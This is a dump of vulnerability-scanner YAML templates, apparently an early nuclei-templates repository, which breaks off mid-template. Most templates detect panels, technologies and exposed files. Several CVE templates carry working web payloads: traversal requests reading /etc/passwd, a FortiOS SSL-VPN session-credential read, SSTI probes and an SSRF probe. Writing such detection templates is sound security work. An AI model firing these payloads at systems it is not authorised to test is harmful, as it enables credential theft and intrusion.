├── .yamllint ├── files ├── git-config.yaml ├── wp-xmlrpc.yaml ├── debug-pprof.yaml ├── dir-listing.yaml ├── exposed-svn.yaml ├── jkstatus-manager.yaml ├── drupal-install.yaml ├── laravel-env.yaml ├── telerik-fileupload-detect.yaml ├── wordpress-user-enumaration.yaml ├── jolokia.yaml ├── tomcat.yaml ├── firebase-detect.yaml ├── tomcat-scripts.yaml ├── apc_info.yaml ├── docker-registry.yaml ├── elasticsearch.yaml ├── wadl-files.yaml ├── security.txt.yaml ├── server-status-localhost.yaml ├── phpinfo.yaml └── zip-backup-files.yaml ├── .pre-commit-config.yaml ├── examples ├── basic-http-example.yaml ├── basic-dns-example.yaml ├── dns-multiple-example.yaml ├── http-raw.yaml ├── http-multiple-matcher.yaml ├── http-multiple-matcher-condition.yaml ├── http-raw-multiple.yaml └── http-intruder-fuzz.yaml ├── panels ├── crxde.yaml ├── grafana-detect.yaml ├── docker-api.yaml ├── compal.yaml ├── mongo-express-web-gui.yaml ├── supervpn-panel.yaml ├── fortinet-fortigate-panel.yaml ├── cisco-asa-panel.yaml ├── globalprotect-panel.yaml ├── parallels-html-client.yaml ├── jenkins-asyncpeople.yaml ├── kubernetes-pods.yaml ├── sap-netweaver-detect.yaml ├── pulse-secure-panel.yaml ├── swagger-panel.yaml ├── sophos-fw-version-detect.yaml ├── phpmyadmin-panel.yaml └── webeditors.yaml ├── technologies ├── sap-netweaver-detect.yaml ├── citrix-vpn-detect.yaml ├── github-enterprise-detect.yaml ├── home-assistant.yaml ├── jenkins-headers-detect.yaml ├── s3-detect.yaml ├── sql-server-reporting.yaml ├── tool-detect.yaml ├── aem-cms-finder.yaml ├── weblogic-detect.yaml ├── werkzeug-debugger-detect.yaml ├── jira-detect.yaml ├── gitlab-detect.yaml ├── jaspersoft-detect.yaml ├── reverse-proxy-detect.yaml ├── graphql.yaml ├── cms-detect.yaml ├── programming-language-detect.yaml ├── web-framework-detect.yaml ├── cdn.yaml ├── linkerd-badrule-detect.yaml ├── linkerd-ssrf-detect.yaml ├── web-server.yaml ├── ntlm-directories.yaml └── tech-detect.yaml ├── cves ├── CVE-2019-19781.yaml ├── CVE-2018-16341.yaml ├── CVE-2018-13379.yaml ├── CVE-2018-6389.yaml ├── CVE-2017-9506.yaml ├── CVE-2018-3760.yaml ├── CVE-2018-14728.yaml ├── CVE-2018-1247.yaml ├── CVE-2020-5284.yaml ├── CVE-2019-12314.yaml ├── CVE-2020-2096.yaml ├── CVE-2018-7490.yaml ├── CVE-2019-19368.yaml ├── CVE-2019-8982.yaml ├── CVE-2020-8115.yaml ├── CVE-2019-3799.yaml ├── CVE-2019-19908.yaml ├── CVE-2018-18069.yaml ├── CVE-2018-5230.yaml ├── CVE-2019-8903.yaml ├── CVE-2018-2791.yaml ├── CVE-2018-20824.yaml ├── CVE-2019-5418.yaml ├── CVE-2019-14974.yaml ├── CVE-2018-19439.yaml ├── CVE-2020-8512.yaml ├── CVE-2019-11510.yaml ├── CVE-2018-1000129.yaml ├── CVE-2020-5410.yaml ├── CVE-2018-0296.yaml ├── CVE-2019-2588.yaml ├── CVE-2018-1271.yaml ├── CVE-2017-7529.yaml ├── CVE-2019-3396.yaml ├── CVE-2020-12720.yaml └── CVE-2019-10475.yaml ├── vulnerabilities ├── twig-php-ssti.yaml ├── rce-shellshock-user-agent.yaml ├── wordpress-duplicator-path-traversal.yaml ├── moodle-filter-jmol-xss.yaml ├── discourse-xss.yaml ├── wordpress-wordfence-xss.yaml ├── moodle-filter-jmol-lfi.yaml ├── x-forwarded-host-injection.yaml ├── crlf-injection.yaml ├── cached-aem-pages.yaml ├── pdf-signer-ssti-to-rce.yaml └── open-redirect.yaml ├── dns ├── servfail-refused-hosts.yaml ├── filter-valid.yaml ├── filter-wildcard.yaml ├── dead-host-with-cname.yaml ├── cname-service-detector.yaml ├── azure-cnames-finder.yaml └── azure-takeover-detection.yaml ├── subdomain-takeover ├── pantheon.io.yaml ├── worksites-takeover.yaml └── detect-all-takeovers.yaml ├── .github └── workflows │ └── syntax-checking.yml ├── security-misconfiguration ├── basic-cors-flash.yaml ├── rack-mini-profiler.yaml ├── basic-cors.yaml ├── front-page-misconfig.yaml ├── jira-service-desk-signup.yaml └── springboot-detect.yaml ├── basic-detections ├── basic-xss-prober.yaml └── general-tokens.yaml ├── tokens ├── google-api-key.yaml ├── mailchimp-api-key.yaml ├── aws-access-key-value.yaml ├── amazon-mws-auth-token-value.yaml ├── http-username-password.yaml └── slack-access-token.yaml ├── README.md ├── LICENSE └── GUIDE.md /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | rules: 5 | document-start: disable 6 | line-length: disable 7 | new-lines: disable 8 | new-line-at-end-of-file: disable 9 | truthy: disable 10 | -------------------------------------------------------------------------------- /files/git-config.yaml: -------------------------------------------------------------------------------- 1 | id: git-config 2 | 3 | info: 4 | name: Git Config Disclosure 5 | author: Ice3man 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.git/config" 12 | matchers: 13 | - type: word 14 | words: 15 | - "[core]" 16 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: end-of-file-fixer 6 | - id: trailing-whitespace 7 | - repo: https://github.com/adrienverge/yamllint.git 8 | rev: v1.17.0 9 | hooks: 10 | - id: yamllint 11 | -------------------------------------------------------------------------------- /examples/basic-http-example.yaml: -------------------------------------------------------------------------------- 1 | id: basic-http-test 2 | 3 | info: 4 | name: Test File 5 | author: pdteam 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/test.txt" 12 | matchers: 13 | - type: word 14 | words: 15 | - "This is test!" 16 | -------------------------------------------------------------------------------- /files/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/xmlrpc.php" 12 | matchers: 13 | - type: status 14 | status: 15 | - 405 16 | -------------------------------------------------------------------------------- /panels/crxde.yaml: -------------------------------------------------------------------------------- 1 | id: crxde 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crx/de/index.jsp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "CRXDE Lite" 16 | -------------------------------------------------------------------------------- /files/debug-pprof.yaml: -------------------------------------------------------------------------------- 1 | id: debug-pprof 2 | 3 | info: 4 | name: pprof debug file 5 | author: pdteam 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/debug/pprof/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Types of profiles available" 16 | -------------------------------------------------------------------------------- /technologies/sap-netweaver-detect.yaml: -------------------------------------------------------------------------------- 1 | id: SAP-Netweaver-Detect 2 | info: 3 | name: SAP NetWeaver Detect 4 | author: rakeshmane10 5 | severity: informative 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/irj/portal' 10 | matchers: 11 | - type: word 12 | words: 13 | - NetWeaver 14 | -------------------------------------------------------------------------------- /cves/CVE-2019-19781.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19781 2 | 3 | info: 4 | name: Citrix ADC Directory Traversal 5 | author: organiccrap 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" 12 | matchers: 13 | - type: word 14 | words: 15 | - "[global]" 16 | -------------------------------------------------------------------------------- /files/dir-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dir-listing 2 | 3 | info: 4 | name: Directory listing enabled 5 | author: _harleo 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Index of /" 16 | - "[To Parent Directory]" 17 | -------------------------------------------------------------------------------- /panels/grafana-detect.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-detect 2 | 3 | info: 4 | name: Grafana panel detect 5 | author: organiccrap 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Grafana" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/citrix-vpn-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-vpn-detect 2 | 3 | info: 4 | name: Citrix VPN Detection 5 | author: bauthard 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/index.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Citrix Gateway" 16 | -------------------------------------------------------------------------------- /technologies/github-enterprise-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Github-Enterprise-Detect 2 | 3 | info: 4 | name: Detect Github Enterprise 5 | author: ehsahil 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GitHub · Enterprise" 16 | -------------------------------------------------------------------------------- /panels/docker-api.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-docker-api 2 | 3 | info: 4 | name: Exposed Docker API 5 | author: furkansenan 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}:2376/version' 12 | matchers: 13 | - type: word 14 | words: 15 | - "Version" 16 | - "Docker" 17 | part: body 18 | -------------------------------------------------------------------------------- /technologies/home-assistant.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant 2 | 3 | info: 4 | name: Detect Home Assistant 5 | author: fabaff 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:8123/" 12 | - "{{BaseURL}}/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Home Assistant" 17 | -------------------------------------------------------------------------------- /technologies/jenkins-headers-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-headers-detect 2 | 3 | info: 4 | name: Jenkins Headers Based Detection 5 | author: ice3man 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "X-Jenkins" 16 | part: header 17 | -------------------------------------------------------------------------------- /panels/compal.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/common_page/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/mongo-express-web-gui.yaml: -------------------------------------------------------------------------------- 1 | id: mongo-express-web-gui 2 | 3 | info: 4 | name: Mongo Express Web GUI 5 | author: puzzlepeaches 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Set-Cookie: mongo-express=" 16 | part: header 17 | -------------------------------------------------------------------------------- /technologies/s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/%c0" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/exposed-svn.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-svn 2 | 3 | info: 4 | name: Exposed SVN Directory 5 | author: udit_thakkur 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.svn/entries" 12 | matchers: 13 | - type: word 14 | words: 15 | - "dir" 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /panels/supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/admin/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Sign In-SuperVPN" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/sql-server-reporting.yaml: -------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Report Manager" 16 | -------------------------------------------------------------------------------- /vulnerabilities/twig-php-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: twig-php-ssti 2 | 3 | info: 4 | name: Twig PHP <2.4.4 template engine - SSTI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/search?search_key={{1337*1338}}" 12 | matchers: 13 | - type: word 14 | words: 15 | - "1788906" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${1330+7}.xhtml" 12 | matchers: 13 | - type: word 14 | words: 15 | - "1337" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/fortinet-fortigate-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fortinet-fortigate-panel 2 | 3 | info: 4 | name: Fortinet FortiGate SSL VPN Panel 5 | author: bsysop 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/remote/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "/remote/fgt_lang" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/tool-detect.yaml: -------------------------------------------------------------------------------- 1 | id: tool-detect 2 | 3 | info: 4 | name: Tool Detect 5 | author: NkxxkN https://twitter.com/NkkxN 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | name: clockwork 15 | words: 16 | - "X-Clockwork-Id" 17 | part: header 18 | -------------------------------------------------------------------------------- /cves/CVE-2018-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-13379 2 | 3 | info: 4 | name: FortiOS - Credentials Disclosure 5 | author: organiccrap 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 12 | matchers: 13 | - type: word 14 | words: 15 | - "var fgt_lang =" 16 | -------------------------------------------------------------------------------- /dns/servfail-refused-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: servfail-refused-hosts 2 | 3 | info: 4 | name: Servfail Host Finder 5 | author: mzack9999 6 | severity: informative 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "SERVFAIL" 18 | - "REFUSED" 19 | -------------------------------------------------------------------------------- /panels/cisco-asa-panel.yaml: -------------------------------------------------------------------------------- 1 | id: cisco-asa-panel-detect 2 | 3 | info: 4 | name: Cisco ASA VPN panel detect 5 | author: organiccrap 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/+CSCOE+/logon.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "SSL VPN Service" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/globalprotect-panel.yaml: -------------------------------------------------------------------------------- 1 | id: globalprotect-panel 2 | 3 | info: 4 | name: PaloAlto Networks GlobalProtect Panel 5 | author: organiccrap 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/global-protect/login.esp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GlobalProtect Portal" 16 | -------------------------------------------------------------------------------- /subdomain-takeover/pantheon.io.yaml: -------------------------------------------------------------------------------- 1 | id: pantheon-io-takeover 2 | 3 | info: 4 | name: Find Pantheon.io subdomain takeover 5 | author: pxmme1337 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "The gods are wise, but do not know of the site which you seek." 16 | -------------------------------------------------------------------------------- /files/jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: bauthard 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | headers: 11 | X-Forwarded-For: "127.0.0.1" 12 | path: 13 | - "{{BaseURL}}/jkstatus/" 14 | matchers: 15 | - type: word 16 | words: 17 | - "JK Status Manager" 18 | -------------------------------------------------------------------------------- /panels/parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: bauthard 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/RASHTML5Gateway/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Parallels HTML5 Client" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/drupal-install.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-install 2 | 3 | info: 4 | name: Drupal Install 5 | author: NkxxkN 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/install.php?profile=default" 12 | redirects: true 13 | max-redirects: 1 14 | matchers: 15 | - type: word 16 | words: 17 | - "Choose language | Drupal" 18 | -------------------------------------------------------------------------------- /files/laravel-env.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-env 2 | 3 | info: 4 | name: Laravel .env file 5 | author: pxmme1337 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.env" 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - "APP_NAME" 17 | - type: status 18 | status: 19 | - 200 20 | -------------------------------------------------------------------------------- /technologies/aem-cms-finder.yaml: -------------------------------------------------------------------------------- 1 | id: aem-cms-finder 2 | 3 | info: 4 | name: AEM Finder 5 | author: mzack9999 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | matchers: 13 | - type: word 14 | words: 15 | - "/etc/clientlibs/" 16 | - "/content/dam/" 17 | part: body 18 | condition: or 19 | -------------------------------------------------------------------------------- /technologies/weblogic-detect.yaml: -------------------------------------------------------------------------------- 1 | id: WebLogic-Detect 2 | 3 | info: 4 | name: Detect Weblogic 5 | author: bing0o 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:7001/console/login/LoginForm.jsp" 12 | - "{{BaseURL}}/console/login/LoginForm.jsp" 13 | matchers: 14 | - type: word 15 | words: 16 | - "WebLogic" 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-6389.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-6389 2 | 3 | info: 4 | name: Wordpress Load Script 5 | author: nadino 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-admin/load-scripts.php?load=" 12 | matchers: 13 | - type: dsl 14 | dsl: 15 | - 'contains(x_powered_by,"Engine")' 16 | - 'contains(content_type,"javascript")' 17 | -------------------------------------------------------------------------------- /panels/jenkins-asyncpeople.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-async-people 2 | 3 | info: 4 | name: Jenkins panel async-people 5 | author: nadino 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/asynchPeople/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "People - [Jenkins]" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2017-9506.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-9506 2 | 3 | info: 4 | name: Jira IconURIServlet SSRF 5 | author: Ice3man 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json" 12 | matchers: 13 | - type: word 14 | words: 15 | - "ipinfo.io/missingauth" 16 | part: body 17 | -------------------------------------------------------------------------------- /examples/basic-dns-example.yaml: -------------------------------------------------------------------------------- 1 | id: basic-dns-example 2 | 3 | info: 4 | name: Basic DNS Request 5 | author: pdteam 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: CNAME 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | # The response must contains a CNAME record 18 | - "IN\tCNAME" 19 | -------------------------------------------------------------------------------- /subdomain-takeover/worksites-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: worksites-takeover 2 | 3 | info: 4 | name: Find worksites-takeover 5 | author: melbadry9 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - "(?:Company Not Found|you’re looking for doesn’t exist)" 16 | part: body 17 | -------------------------------------------------------------------------------- /dns/filter-valid.yaml: -------------------------------------------------------------------------------- 1 | id: filter-valid 2 | 3 | info: 4 | name: Valid Domains Filter 5 | author: mzack9999 6 | severity: informative 7 | 8 | dns: 9 | - name: "{{FQDN}}" # Random prefix 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "NOERROR" 18 | - "IN\tCNAME" 19 | - "IN\tA" 20 | -------------------------------------------------------------------------------- /technologies/werkzeug-debugger-detect.yaml: -------------------------------------------------------------------------------- 1 | id: werkzeug-debugger-detect 2 | 3 | info: 4 | name: Werkzeug debugger console 5 | author: pdnuclei - projectdiscovery.io 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/console" 12 | matchers: 13 | - type: word 14 | words: 15 | - "

Interactive Console

" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/jira-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jira-detect 2 | 3 | info: 4 | name: Detect Jira Issue Management Software 5 | author: bauthard 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/secure/Dashboard.jspa" 12 | - "{{BaseURL}}/jira/secure/Dashboard.jspa" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Project Management Software" 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-3760.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-3760 2 | 3 | info: 4 | name: Rails cve-2018-3760 5 | author: 0xrudra 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /files/telerik-fileupload-detect.yaml: -------------------------------------------------------------------------------- 1 | id: telerik-fileupload-detect 2 | 3 | info: 4 | name: Detect Telerik Web UI fileupload handler 5 | author: organiccrap 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" 12 | matchers: 13 | - type: word 14 | words: 15 | - "RadAsyncUpload handler is registered successfully" 16 | -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: syntax-checking 2 | 3 | on: [push, pull_request] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: actions/checkout@v2 10 | - name: Yamllint 11 | uses: karancode/yamllint-github-action@master 12 | with: 13 | yamllint_config_filepath: .yamllint 14 | yamllint_strict: false 15 | yamllint_comment: true 16 | -------------------------------------------------------------------------------- /dns/filter-wildcard.yaml: -------------------------------------------------------------------------------- 1 | id: filter-wildcard 2 | 3 | info: 4 | name: Wildcard Filter 5 | author: mzack9999 6 | severity: informative 7 | 8 | dns: 9 | - name: "0831058744.{{FQDN}}" # Random prefix 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "NXDOMAIN" 18 | - "SERVFAIL" 19 | - "REFUSED" 20 | -------------------------------------------------------------------------------- /files/wordpress-user-enumaration.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-user-enumaration 2 | 3 | info: 4 | name: Wordpress user enumeration 5 | author: Manas_Harsh 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-json/wp/v2/users/" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - avatar_urls 19 | -------------------------------------------------------------------------------- /cves/CVE-2018-14728.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-14728 2 | 3 | info: 4 | name: Responsive filemanager 9.13.1 - SSRF/LFI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: POST 10 | path: 11 | - "{{BaseURL}}/filemanager/upload.php" 12 | 13 | body: "fldr=&url=file:///etc/passwd" 14 | 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /files/jolokia.yaml: -------------------------------------------------------------------------------- 1 | id: jolokia instance 2 | 3 | info: 4 | name: Jolokia Version Disclosure 5 | author: mavericknerd 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/jolokia/version' 12 | - '{{BaseURL}}:8080/jolokia/version' 13 | matchers: 14 | - type: word 15 | words: 16 | - '"agent":' 17 | - type: status 18 | status: 19 | - 200 20 | -------------------------------------------------------------------------------- /security-misconfiguration/basic-cors-flash.yaml: -------------------------------------------------------------------------------- 1 | id: basic-cors-misconfig-flash 2 | 3 | info: 4 | name: Basic CORS misconfiguration exploitable with Flash 5 | author: nadino 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crossdomain.xml" 12 | matchers: 13 | - type: word 14 | words: 15 | - 'allow-access-from domain="*"' 16 | part: body 17 | -------------------------------------------------------------------------------- /basic-detections/basic-xss-prober.yaml: -------------------------------------------------------------------------------- 1 | id: basic-xss-prober 2 | 3 | info: 4 | name: Basic XSS Prober 5 | author: nadino 6 | severity: low 7 | 8 | # Basic XSS prober 9 | # Manual testing needed for exploitation 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" 15 | matchers: 16 | - type: word 17 | words: 18 | - "'>" 19 | -------------------------------------------------------------------------------- /cves/CVE-2018-1247.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-1247 2 | 3 | info: 4 | name: RSA Authentication Manager XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//" 12 | matchers: 13 | - type: word 14 | words: 15 | - "application/x-shockwave-flash" 16 | part: header 17 | -------------------------------------------------------------------------------- /files/tomcat.yaml: -------------------------------------------------------------------------------- 1 | id: tomcat-instance 2 | 3 | info: 4 | name: tomcat manager disclosure 5 | author: Ahmed Sherif 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/manager/html' 12 | - '{{BaseURL}}:8080/manager/html' 13 | matchers: 14 | - type: word 15 | words: 16 | - '"Unauthorized":' 17 | - type: status 18 | status: 19 | - 401 20 | -------------------------------------------------------------------------------- /security-misconfiguration/rack-mini-profiler.yaml: -------------------------------------------------------------------------------- 1 | id: rack-mini-profiler 2 | 3 | info: 4 | name: rack-mini-profiler environmnet information discloure 5 | author: vzamanillo 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/?pp=env" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Rack Environment" 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /cves/CVE-2020-5284.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5284 2 | 3 | info: 4 | name: Next.js .next/ limited path traversal 5 | author: Harsh & Rahul 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/_next/static/../server/pages-manifest.json" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - '\{"/_app":".*?_app\.js"' 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /files/firebase-detect.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-detect 2 | 3 | info: 4 | name: firebase detect 5 | author: organiccrap 6 | severity: low 7 | # http://ghostlulz.com/google-exposed-firebase-database/ 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - 